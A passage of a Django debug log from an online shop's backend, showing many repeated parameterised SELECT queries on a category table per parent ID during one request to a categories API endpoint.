"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:51:47,916 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:51:47,919 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:51:47,922 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:51:47,924 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:51:47,927 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:51:47,929 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:51:47,931 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:51:47,935 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:51:47,937 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:51:47,939 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:51:47,941 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:51:47,944 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:51:47,947 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:51:47,949 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:51:47,951 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:51:47,953 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:51:47,956 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:51:47,959 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:51:47,962 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:51:47,964 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:51:47,966 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:51:47,968 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:51:47,970 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:51:47,974 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:51:47,976 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:51:47,978 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:51:47,980 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:51:47,982 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:51:47,986 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:51:47,988 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:51:47,990 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:51:47,992 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:51:47,994 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:51:47,998 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:51:48,001 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:51:48,003 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:51:48,008 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:51:48,012 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:51:48,015 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:51:48,018 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:51:48,021 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:51:48,023 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:51:48,026 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:51:48,028 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:51:48] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:51:51,719 utils 32506 139738707130112 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:51:51,725 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:51:51,729 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:51:51,731 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:51:51,736 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:51:51,738 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:51:51,741 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:51:51,743 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:51:51,746 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:51:51,749 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:51:51,752 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:51:51,754 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:51:51,756 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:51:51,758 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:51:51,762 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:51:51,764 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:51:51,766 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:51:51,768 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:51:51,770 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:51:51,774 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:51:51,776 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:51:51,778 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:51:51,780 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 